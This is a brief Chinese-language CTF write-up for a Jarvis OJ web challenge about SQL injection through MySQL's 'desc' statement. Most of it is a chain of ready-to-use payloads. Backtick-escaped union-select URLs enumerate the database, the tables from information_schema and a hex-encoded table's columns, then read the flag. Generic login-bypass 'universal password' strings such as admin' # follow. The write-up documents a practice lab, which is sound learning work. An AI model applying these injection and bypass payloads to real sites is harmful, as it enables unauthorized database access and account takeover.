desc注入
{describe|desc} tbl_name [col_name |wild]
describe提供有关一个表的列信息。col_name可以是一个列名或是一个包含sql通配符字符 “%”和“_”的字符串。
web.jarvisoj.com:32794
查看源代码:http://web.jarvisoj.com:32794/index.php~
get $table
$ret[0]
desc secret_$table
$table=aa union select 1,2,3
反引号用于保留字符 ‘’
union select 1
desc 'union select 1'
desc 'union select 1'
http://web.jarvisoj.com:32794/index.php?table=test` `union select database() limit 1 offset 1
http://web.jarvisoj.com:32794/index.php?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1 offset 1
secret_flag,secret_test
http://web.jarvisoj.com:32794/index.php?table=test` `union select group_concat(column_name) from information_schema.columns where table_name=secret_flag limit 1 offset 1
(这样是不行的,需要给表名进制转换)
http://web.jarvisoj.com:32794/index.php?table=test` `union select group_concat(column_name) from information_schema.columns where table_name=0x7365637265745f666c6167 limit 1 offset 1
列名: flagUwillNeverKnow
http://web.jarvisoj.com:32794/index.php?table=test` `union select flagUwillNeverKnow from secret_flag limit 1 offset 1
万能密码:
select * from admin where username='' and password =''
admin' # '+' '+' 0
Aaa'='
